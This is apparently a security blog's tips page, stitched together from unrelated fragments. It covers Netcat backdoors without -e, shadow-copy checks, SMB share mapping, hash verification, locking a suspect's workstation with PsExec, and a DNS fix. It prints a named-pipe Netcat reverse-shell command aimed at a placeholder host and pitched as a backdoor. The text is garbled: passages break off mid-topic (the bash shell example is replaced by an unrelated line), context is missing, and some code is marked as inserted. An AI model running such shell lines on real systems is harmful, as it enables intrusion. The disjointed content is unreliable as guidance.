A Passion for Security

Tips & Tricks

Netcat backdoor without -e (execute option)

Netcat is installed by default on a lot of Linux systems; however, we are seeing more and more Netcat builds that are compiled without the -e option. The -e option allows us to execute a program and serve it over the connecting socket. It is an incredibly handy feature, both for controlling an executable over a network connection and for creating simple backdoors. Thus, as a security measure, Netcat is sometimes compiled without the -e option. In fact, if you want to compile Netcat with the -e option, you need to compile it with the GAPING_SECURITY_HOLE option.

While the -e option can be a concern from a security point of view, it is often trivially bypassed.

Below are examples that serve shells without the execute option. In the examples, a special Linux file type, a named pipe, is used. This is a FIFO (first in, first out) structure: what goes in first comes out first, which is quite handy for pushing data through in an orderly fashion.

mknod pipe p

/bin/bash 0<pipe | nc TargetIP Port

I don't care what you just showed me, I don't have Netcat!

Bash can open arbitrary TCP and UDP connections to wherever you want, so a Netcat-like reverse shell would be:

This handy little command reminds me by audio when my computer is back online. I just had a 30 minute Internet outage, and it was nice to get right back to my seat when my computer started bleeping out alarms.

This leaves no useful traces in the registry for us to audit, so I think the best way to detect this is to query the machines where you know Volume Shadow Copies are enabled and see whether they still have any backups stored. To query for this information we can use wmic, another built-in command which can reach network-attached machines:

wmic /node:@ip.txt shadowcopy list brief

This little command runs against every IP address in the file ip.txt and returns the respective backup volumes.
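The same check done with CIM from PowerShell, as an added example that is not the post's own command: it reads the same ip.txt, asks every host for its Win32_ShadowCopy instances, and flags reachable machines that report none. It assumes the account running it has admin rights on the targets (as wmic /node: also needs) and that WinRM is enabled on them.

```powershell
# Added example, not the original post's script: wmic "shadowcopy list brief"
# done via CIM so the result can be filtered and exported.
# Assumes ip.txt holds one host per line, admin rights on the targets and WinRM.
function Get-ShadowCopyInventory {
    param([string]$HostFile = 'ip.txt')

    foreach ($target in Get-Content $HostFile | Where-Object { $_.Trim() }) {
        try {
            $copies = @(Get-CimInstance -ClassName Win32_ShadowCopy -ComputerName $target -ErrorAction Stop)
            [pscustomobject]@{
                Host      = $target
                Reachable = $true
                Count     = $copies.Count
                # Newest snapshot; a host whose copies vanished shows $null here
                Newest    = ($copies | Sort-Object InstallDate -Descending | Select-Object -First 1).InstallDate
            }
        }
        catch {
            # Unreachable hosts are reported separately so they are not mistaken for "no copies"
            [pscustomobject]@{ Host = $target; Reachable = $false; Count = 0; Newest = $null }
        }
    }
}

# Hosts that should have shadow copies but report none deserve a closer look:
# deleting shadow copies is a common ransomware precursor.
Get-ShadowCopyInventory | Where-Object { $_.Reachable -and $_.Count -eq 0 } |
    Format-Table -AutoSize
```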

With all the ransomware hitting everyone, everywhere, I decided to share my scripts on how I map the attack surface of internal threats, and subsequently ransomware / cryptolocker. It is not fully automated yet, but hopefully sharing this will give people the right ideas, and perhaps some might even automate it. For now, this only works for file sharing using Windows default file sharing. PS: I realize this is far from perfect, and probably should all be doable with a simple nmap script, however this is what I use in conjunction with some other work.

A typical scenario for using these scripts and commands is users that should not have access to a bunch of files on your file servers. Close down those shares and permissions before the inevitable happens and the files are stolen and encrypted.

We start off with scanning every host who has port 445 open (Microsoft SMB):

nmap -p 445 -T4 -oG 445.txt 192.168.1.1-254

Replace the IP address range with whatever suits your network. Next, we grep out the hosts which are relevant for checking which file shares they expose.

cat tmp/445.txt | grep "445/open" | cut -d " " -f 2 > hosts.txt

With the relevant hosts in a separate file, let's use enum4linux to enumerate all the potential shares on these servers. Remember to add the username and password of the account you want to use for the mapping.

This produces a file shares.txt containing the potential shares we want to investigate and close down. Now we'll edit the following script, put it in a bat file, and let it run. Remember to add the necessary credentials and domain information.
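A PowerShell version of the share-mapping step, added here as an example and not the post's own bat file: instead of enum4linux it uses "net view" to list each host's shares and then records which of them the current account can read, so running it as an ordinary domain user shows exactly what ransomware on that user's desktop could reach. It assumes hosts.txt from the nmap step above and English "net view" output (the word "Disk" in the Type column).

```powershell
# Added example, not the original post's bat file. Lists each host's shares with
# "net view" and checks which the *current* account can read. Run it as a normal
# user, not an admin, to map what such a user could reach.
# Assumes hosts.txt (one host per line) and English "net view" output.
function Get-ReadableShares {
    param([string]$HostFile = 'hosts.txt')

    foreach ($h in Get-Content $HostFile | Where-Object { $_.Trim() }) {
        $output = net view "\\$h" /all 2>$null
        if ($LASTEXITCODE -ne 0) {
            [pscustomobject]@{ Host = $h; Share = $null; Readable = $false; Note = 'net view failed' }
            continue
        }
        foreach ($line in $output) {
            # Share lines look like: "Finance    Disk    quarterly reports"
            if ($line -match '^(\S+)\s+Disk\b') {
                $share = $matches[1]
                $unc = "\\$h\$share"
                # Readable if we can list the root directory of the share
                $canRead = $false
                try {
                    Get-ChildItem -LiteralPath $unc -Force -ErrorAction Stop | Out-Null
                    $canRead = $true
                }
                catch { $canRead = $false }
                [pscustomobject]@{ Host = $h; Share = $share; Readable = $canRead; Note = '' }
            }
        }
    }
}

# Shares a plain user can read are the ones to review (and close down) first.
Get-ReadableShares | Where-Object Readable | Export-Csv shares.csv -NoTypeInformation
```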

You might need to check file hashes across multiple directories and across multiple algorithms, e.g. verifying the hash sums of all files against both MD5 and SHA1. This is an example of how to accomplish such a task using PowerShell.
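One way to do this, as an added example rather than the post's own script: hash every file under the given directories with each requested algorithm, record that as a baseline CSV, and later compare the directories against the baseline to report new, modified and missing files. It assumes PowerShell 4 or later for Get-FileHash; the function names are my own.

```powershell
# Added example, not the original post's script. Computes MD5 and SHA1 for every
# file under the given directories and compares them against a reference CSV
# with the columns Path,Algorithm,Hash (as written by Get-HashTable below).
# Assumes PowerShell 4+ for Get-FileHash.
function Get-HashTable {
    param([string[]]$Directory, [string[]]$Algorithm = @('MD5', 'SHA1'))
    foreach ($dir in $Directory) {
        foreach ($file in Get-ChildItem -LiteralPath $dir -File -Recurse) {
            foreach ($algo in $Algorithm) {
                [pscustomobject]@{
                    Path      = $file.FullName
                    Algorithm = $algo
                    Hash      = (Get-FileHash -LiteralPath $file.FullName -Algorithm $algo).Hash
                }
            }
        }
    }
}

function Compare-HashTable {
    param([string[]]$Directory, [string]$Reference, [string[]]$Algorithm = @('MD5', 'SHA1'))
    $expected = @{}
    foreach ($row in Import-Csv $Reference) { $expected["$($row.Path)|$($row.Algorithm)"] = $row.Hash.ToUpper() }

    $seen = @{}
    foreach ($entry in Get-HashTable -Directory $Directory -Algorithm $Algorithm) {
        $key = "$($entry.Path)|$($entry.Algorithm)"
        $seen[$key] = $true
        if (-not $expected.ContainsKey($key)) {
            [pscustomobject]@{ Path = $entry.Path; Algorithm = $entry.Algorithm; Status = 'NEW' }
        } elseif ($expected[$key] -ne $entry.Hash) {
            [pscustomobject]@{ Path = $entry.Path; Algorithm = $entry.Algorithm; Status = 'MODIFIED' }
        }
    }
    # Reference entries with no file on disk: something was deleted or renamed
    foreach ($key in $expected.Keys | Where-Object { -not $seen.ContainsKey($_) }) {
        $path, $algo = $key -split '\|'
        [pscustomobject]@{ Path = $path; Algorithm = $algo; Status = 'MISSING' }
    }
}

# Record a baseline once, then compare against it later:
# Get-HashTable -Directory C:\www, D:\share | Export-Csv baseline.csv -NoTypeInformation
# Compare-HashTable -Directory C:\www, D:\share -Reference baseline.csv | Format-Table
```

A file that matches under one algorithm but not the other is reported as MODIFIED for that algorithm only, which is itself worth noticing.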

Sometimes you have to throw someone off a terminal, but at the same time preserve the evidence on the terminal. For example, if someone is using a terminal to hack something, you need to secure the running terminals to capture the commands that have been run. It is quite simple to accomplish this, as the process below demonstrates.

First, change the target account's AD password. This will prevent them from logging back in.

Next, target the terminal with PsExec and use rundll32 to call the LockWorkStation function in user32.dll. This will lock the workstation. The following command can be tweaked for your purposes: PsExec.exe \\<ip> -d -u <domain>\Administrator -i cmd.exe /c "C:\windows\system32\rundll32.exe user32.dll, LockWorkStation"

Now it's time to seize the terminal. Make sure you are standing by ready for this, as the victim could be distressed and shut down his workstation, essentially removing evidence.

This concept can be expanded further, as Darryl Griffiths pointed out to me on LinkedIn. Coupling the initial idea of locking the workstation with AD Group Policies that modify the power settings on the target workstation, one can even prevent the machine from shutting down, e.g. when the power button is pressed or the laptop lid is closed. Power Management in Windows normally allows this kind of override of the power button's function, and more can be read about this concept in the following TechNet article: https://blogs.technet.microsoft.com/askds/2008/03/21/managing-power-with-group-policy-part-3-of-3/

Sometimes you have to find interesting files, then grep through those specific files dynamically. With Linux this is as easy as:

find . -name <file> -exec grep -i -H <match> {} \;

This will recursively look for the files you want to find, e.g. *.txt, and for each file found, grep that file for whatever content you want to match. Other useful variations are to grep with a regex, or to use further find options to filter for specific types of files.

This is likely because your DHCP server pushes out a SearchDomain of <whatever>.local. Edit your /etc/resolv.conf and remove the line dictating the SearchDomain, and you should see a huge boost in speed!